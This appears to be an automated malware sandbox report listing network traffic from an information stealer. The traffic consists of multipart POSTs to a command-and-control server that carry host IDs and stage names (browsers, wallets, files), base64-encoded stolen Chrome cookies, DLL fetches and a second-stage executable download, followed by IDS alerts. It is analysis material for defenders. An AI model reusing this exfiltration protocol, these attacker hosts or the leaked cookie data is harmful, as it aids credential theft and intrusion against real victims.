Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKEHost: 62.204.41.176Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 39 35 36 36 34 45 39 41 30 39 32 36 35 33 37 36 34 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 37 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="hwid"A995664E9A092653764225------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="build"default7_cap------ECBAEBGHDAECBGDGCAKE--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFCHost: 62.204.41.176Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 2d 2d 0d 0a Data Ascii: ------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="message"browsers------EGDGIIJJECFIDHJJKKFC--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKJJKFHIJKKFHJJECBAHost: 62.204.41.176Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 2d 2d 0d 0a Data Ascii: ------IJKJJKFHIJKKFHJJECBAContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------IJKJJKFHIJKKFHJJECBAContent-Disposition: form-data; name="message"plugins------IJKJJKFHIJKKFHJJECBA--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJDHost: 62.204.41.176Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 2d 2d 0d 0a Data Ascii: ------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="message"fplugins------AAEGHJKJKKJDHIDHJKJD--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFIHost: 62.204.41.176Content-Length: 5147Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/sqlite3.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIEGCAECGCAEBFHDHIEHost: 62.204.41.176Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 2d 2d 0d 0a Data Ascii: ------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDGCGHCGHCBFHJJKKJEHost: 62.204.41.176Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 33 4a 6c 61 47 70 6c 63 6d 64 79 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="file_name"Z3JlaGplcmdyLnB3ZA==------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="file"------JJDGCGHCGHCBFHJJKKJE--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIJKEHCAKFCAKFHDAAAHost: 62.204.41.176Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 33 4a 6c 61 47 70 6c 63 6d 64 79 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 41 2d 2d 0d 0a Data Ascii: ------EGIJKEHCAKFCAKFHDAAAContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------EGIJKEHCAKFCAKFHDAAAContent-Disposition: form-data; name="file_name"Z3JlaGplcmdyLnB3ZA==------EGIJKEHCAKFCAKFHDAAAContent-Disposition: form-data; name="file"------EGIJKEHCAKFCAKFHDAAA--
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/freebl3.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/mozglue.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/msvcp140.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/nss3.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/softokn3.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/vcruntime140.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKECBFCGIEGCBGCAECGCHost: 62.204.41.176Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHIHost: 62.204.41.176Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="message"wallets------FCAFIJJJKEGIECAKKEHI--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIEHost: 62.204.41.176Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 2d 2d 0d 0a Data Ascii: ------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="message"files------DAAAFBKECAKEHIEBAFIE--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Host: 62.204.41.176Content-Length: 1663Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Host: 62.204.41.176Content-Length: 1380Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Host: 62.204.41.176Content-Length: 1380Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Host: 62.204.41.176Content-Length: 1663Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Host: 62.204.41.176Content-Length: 1380Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Host: 62.204.41.176Content-Length: 1380Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Host: 62.204.41.176Content-Length: 1380Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Host: 62.204.41.176Content-Length: 1380Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Host: 62.204.41.176Content-Length: 1380Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Host: 62.204.41.176Content-Length: 1663Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Host: 62.204.41.176Content-Length: 1380Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Host: 62.204.41.176Content-Length: 1380Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Host: 62.204.41.176Content-Length: 1663Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Host: 62.204.41.176Content-Length: 1663Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Host: 62.204.41.176Content-Length: 1663Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Host: 62.204.41.176Content-Length: 1663Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCHost: 62.204.41.176Content-Length: 99039Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDGCGHCGHCBFHJJKKJEHost: 62.204.41.176Content-Length: 269Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 74 6b 6a 77 65 66 77 65 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="message"tkjwefwee------JJDGCGHCGHCBFHJJKKJE--
Source: global traffic HTTP traffic detected: GET /seed.exe HTTP/1.1Host: 176.113.115.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJJKFCBGIDGHIECGCBKHost: 62.204.41.176Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4a 4b 46 43 42 47 49 44 47 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 4b 46 43 42 47 49 44 47 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 72 68 65 74 6a 72 65 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 4b 46 43 42 47 49 44 47 48 49 45 43 47 43 42 4b 2d 2d 0d 0a Data Ascii: ------EHJJKFCBGIDGHIECGCBKContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------EHJJKFCBGIDGHIECGCBKContent-Disposition: form-data; name="message"rhetjree------EHJJKFCBGIDGHIECGCBK--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 2.2.2.2 2.2.2.2
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: FranceTelecom-OrangeFR FranceTelecom-OrangeFR
Source: Joe Sandbox View ASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49979 -> 176.113.115.37:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49980 -> 62.204.41.176:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49981 -> 176.113.115.37:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49978 -> 104.21.56.70:443
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.37
